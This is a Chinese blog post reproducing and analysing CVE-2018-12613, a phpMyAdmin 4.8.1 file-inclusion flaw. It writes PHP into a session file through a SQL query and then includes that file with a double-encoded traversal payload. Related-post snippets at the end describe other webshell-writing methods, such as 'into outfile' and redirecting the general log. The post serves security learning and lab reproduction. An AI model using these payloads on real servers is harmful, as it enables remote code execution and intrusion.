phpMyAdmin另一种getshell姿势(CVE-2018-12613)

已于 2022-04-17 14:51:27 修改
阅读量2.5k 收藏 1
点赞数
分类专栏: 漏洞复现 WEB安全 文章标签: web安全 php
于 2022-04-17 14:48:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43263451/article/details/124229466
版权

我知道phpmyadmin的getshell大概有日志写马和select into outfile两种姿势,最近又新学了一种getshell姿势,赶紧记录一下

思路大概就是我们执行的sql语句会被记录到你的session文件中去,那我们就可以写马到自己的session文件,然后利用远程文件包含漏洞(CVE-2018-12613),导致可以getshell

漏洞复现

环境:
phpmyadmin4.8.1
php 7.2.5

登入后查询select “<?php phpinfo();?>”;

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-687qbR7u-1650177646862)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220417133834856.png)]

这个查询语句会记录到我们的session文件中去

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cCalcJqp-1650177646862)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220417133952007.png)]

那我们利用phpmyadmin的远程文件包含漏洞包含该session文件就可以rce

常见的session文件存在位置
/tmp
/var/lib/php/session
Windows:
C:\WINDOWS\Temp

我们这里是在/tmp目录下

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9L3naFVD-1650177646863)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220417135150356.png)]

利用远程文件包含漏洞payload成功rce

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0PUaE1nf-1650177646863)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220417135315936.png)]

漏洞分析

首先是在index.php的55行一共有5个判断条件,判断成功后就会包含我们传入的变量,现在目标就是让条件都成立

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3FyB9FXV-1650177646864)(C:\Users\91136\AppData\Roaming\Typora\typora-user-images\image-20220417141800656.png)]

第一个不为空,好说

第二个为字符串,好说

第三个不能以index开头,好说

第四个不能在黑名单里,好说

主要是看第五个,我们得让他返回true

跟进Core::checkPageValidity,这里面一共有三处可以返回true,我们一处一处看

    public static function checkPageValidity(&$page, array $whitelist = [])
    {
        if (empty($whitelist)) {
            $whitelist = self::$goto_whitelist;
        }
        if (! isset($page) || !is_string($page)) {
            return false;
        }

        if (in_array($page, $whitelist)) {
            return true;
        }

        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        return false;
    }

首先定义了一个白名单,白名单就是这个

public static $goto_whitelist = array(
        'db_datadict.php',
        'db_sql.php',
        'db_events.php',
        'db_export.php',
		...
    );

接下来就是判断$page是否在白名单,我们是为了包含其他文件,那这肯定不在白名单里面,所以第一个返回true的不行

那就看第二个返回true的地方,它是将$page中问号前面的截下来并判断是否在白名单里面如果在就返回true,我们可以构造$page为db_sql.php?/…/…/…/…/…/…/…/etc/passwd,这样就可以返回true,从而if判断成功进入if分支,但是include里面是不能有问号的这就导致包含失败,所以第二个返回true的地方不能用

我们继续看第三处返回true的地方

$_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

先对$page解码然后依然将$page中问号前面的截下来判断是否在白名单里面如果在就返回true,那么我们可以构造$page为db_sql.php%253F/…/…/…/…/…/…/…/etc/passwd,其中%253F为问号的二次编码,这样的话返回true从而进入if分支,然后包含db_sql.php%3F/…/…/…/…/…/…/…/etc/passwd,这就可以正确包含到passwd文件了

Getshell

根据phpmyadmin会将用户执行的sql语句写入用户的session文件中,致使我们可以写马进session文件,再通过这个远程文件包含漏洞从而来getshell

参考文献

https://xz.aliyun.com/t/5534

https://vulhub.org/#/environments/phpmyadmin/CVE-2018-12613/

浔阳江头夜送客丶
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【渗透测试】--- 利用phpmyadmingetshell
qq_43168364的博客
12-24 636
利用phpmyadmingetshell有两种方式 1、利用into outfile直接将一句话写入文件中 2、利用Mysql的日志文件getshell 不论是那种方式都要满足以下三个条件: 未限制文件路径 secure_file_priv= 当前用户有写文件权限 知道网站根目录 — C:\phpStudy\PHPTutorial\WWW 第一种方法 select "<?php phpinfo();?>" into outfile "/var/www/html/tes
【漏洞复现】CVE-2018-12613 phpMyAdmin文件包含getshell
Mr_atopos的博客
05-22 431
该漏洞影响phpMyAdmin 4.8.0-4.8.1版本 checkPageValidity函数对数据的处理逻辑不够严密,利用二次url编码绕过文件包含检测 payload 通过查询在session中添加php语句,再通过文件包含执行 ?target=db_sql.php%253f/…/…/…/…/…/…/…/…/(要包含的文件) target有白名单检测机制,db_sql.php在白名单中 通过?的二次编码成%253f target在检测白名单的时候,会对db_sql.php%253f进行二次u
【WEB安全】PHPMyAdmin后台GetShell姿势总结
网络安全知识分享
12-31 4697
PHPMyAdmin后台GetShell姿势总结前言:本地环境:数据库文件导出写入利用条件利用方式数据库全局日志写入利用条件利用方式数据库慢查询日志写入利用条件利用方式CVE-2018-12613利用条件利用方式CVE-2018-19968利用条件利用方式 前言: phpMyAdmin是一个以PHP为基础,以web方式架构在服务器上的MySQL的数据库管理工具。让管理者可以通过Web接口来管理MySQL数据库。因其基于Web的简便易操作的图形化界面备受网站管理者的喜爱。 当我们通过其它各类手段获取到MySQ
phpmyadmin getshell
YouthBelief的博客
11-11 4920
phpmyadmin getshell前言一、into outfile写马条件利用方法操作二、开启日志写马getshell条件利用方法操作三、慢查询webshell利用方法操作四、创建数据库和表写入webshell条件利用方法特殊版本getshell 前言 phpMyadmin是一个以PHP为基础的MySQL数据库管理工具,使网站管理员可通过Web接口管理数据库。 虽然网上有很多公开的文章,也用过很多次了,但自己再总结一遍方便自己查阅。 一、into outfile写马 条件 1.对web目录需要有写权限能
CVE-2018-12613 phpmyadmin文件包含getshell连载(三)
PANDA墨森的博客
06-24 632
这是phpmyadmin系列渗透思路的第三篇文章,前面一篇文章阐述了通过慢查询日志getshell,本文将通过文件包含漏洞展开讨论 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13164349.html #001 影响版本 Phpmyadmin 4.8.0/4.8.0.1/4.8.1 #002 漏洞验证利用 http://www.xxx.com/index.php?target=db_sql.php%253f/../../../../../../e.
phpmyadmin 远程文件包含漏洞(CVE-2018-12613) - tdcoming'blog QQ group 906
08-04
漏洞背景背景介绍phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具…阅读数 156博文CVE-2018-12613 --- 本地文件包含造成
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin...
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-05
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
通过phpMyadmin后台获取shell(getshell
qq_46527080的博客
12-07 2254
通过phpMyadmin后台获取shell 前提: 1.要知道靶机的mysql用户名和密码 2.能成功登录到靶机phpmyadmin中 先登入对方phpmyadmin 然后找到执行sql语句的框架 1.开启日志 set global general_log='on' 2.指定日志写入的文件,就是一句话木马写入的路径 set global general_log_file ="C:/php/PHPTutorial/WWW/she.php" 注意:一定注意路径的斜杠一定是/不是复制的路径 查看靶机根目录,发
PhpMyAdmin后台getshell
qq_50854662的博客
03-14 1069
PhpMyAdmin简介 PhpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。 在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录(可试下:http://ip:端口/phpmyadmin/ )时,进而通过弱口令(可以直接尝试下账号root密码root)或者暴力破解进入管理后台之后,有
phpmyadmingetshell总结
Adminxe的博客
05-03 492
0x00 前言 简单总结下phpmyadmin的gestshell的姿势,总结但不拓展(百度是最好的老师,有时间必定会详细写出利用姿势的方法),建议getshell之前,查看用户权限以及phpmyadmin的版本,方便对于漏洞的利用。 0x01 getshell姿势 1、selectintooutfile直接写入 2、开启全局日志getshell 3、使用慢查询日志getse...
phpmyadmin常见getshell的方法
Blue的博客
06-10 2460
1、利用条件2、如果满足以上条件可以直接写shell在实际写webshell的时候,我们经常会遭受到secure_file_priv的阻拦,secure_file_priv这个配置参数用来限制load data、outfile、load_file()的使用。在高版本的mysql中默认为NULL,就是不让导入和导出解决办法:在Windows下可在my.ini的[mysqld]里面,添加secure_file_priv=在linux下可在/etc/my.cnf的[mysqld]里面,添加secure_file_
phpmyadmin后台getshell方法学习总结
0nc3的博客
11-06 3113
0x00 前言 最近看的一篇文章中提到过phpmyadmin一些后台getshell方式,就想着写篇博客学习总结一下~~ 0x01 getshell方法 一、select into outfile直接写入 1.利用条件 对web目录需要有写权限能够使用单引号 知道绝对路径 没有配置secure_file_priv 2.步骤 先使用show global variables like '%secu...
[vulhub]_phpmyadmin_4.8.1_远程文件包含(cve-2018-12613)复现&RCE实现
fightte的博客
06-05 591
[网络安全任重道远] ~ 题目有点长 ~ 是这样的。这是vulhub的复现,算是第一个接触的vulhub吧,FFFLLLAAAGGG ~ vulhub ----- 是一个漏洞集成平台,依赖于docker,可以方便的复现漏洞,github上有 phpmyadmin ----- 是网页版的数据库管理工具, CVE编号是 ----- CVE-2018-12613, 其漏洞有 ----- 文件包含和远程命令执行, ~ 过程 漏洞具体原因可参考: https://www.cnblogs.com/leixiao-/p/
CVE-2018-12613 --- 本地文件包含造成远程代码执行漏洞复现
wkend的博客
12-26 3262
0x01 了解本地文件包含 LFI(本地文件包含),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。 0x02 了解远程代码执行 RCE(远程代码执行),远程...
利用phpmyadmin日志写入一句话木马
m0_68019293的博客
03-15 2660
首先登陆phpMyadmin后,点击sql模块 先用这一句命令查看它是否存在 secure_file_priv 这项功能,要null不一定等于no哦,如果没有就可以利用来写一个webshell 现在写入一句话木马文件,用into outfile函数 加网站下绝对路径,记住哦要把\ 改为/,因为网站的/ 和根目录下的\是不一样的 现在已经成功的写入了一句话木马的文件,这时候就可以用菜刀,蚁剑等工具链接它的文件绝对路径得到它的webshell,这是第一种方式 2 接下来这种呢就是利用日志..
安装phpMyAdmin,使用into outfile给靶场写入一句话木马
最新发布
DMXA的博客
10-12 314
通过phpinfo页面中Document_Root参数获取网站绝对路径。通过构建sql写入一句话木马。
CVE-2016-5734
09-04
CVE-2016-5734是一个针对PHPMyAdmin的漏洞,该漏洞允许远程攻击者执行任意命令。该漏洞可以通过使用提供的Python脚本来利用,脚本可以在指定的URL上执行特定命令。如果你想进一步了解该漏洞以及如何分析它,可以参考提供的链接。如果你想在本地环境中测试该漏洞,可以下载并安装vulhub,并进入/vulhub/phpmyadmin/CVE-2016-5734目录,然后使用提供的命令启动环境。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [buuctf [PHPMYADMIN]CVE-2016-5734](https://blog.csdn.net/qq_36241198/article/details/115017777)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CVE-2016-5734 Phpmyadmin后台代码执行漏洞复现](https://blog.csdn.net/weixin_41924764/article/details/113063083)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值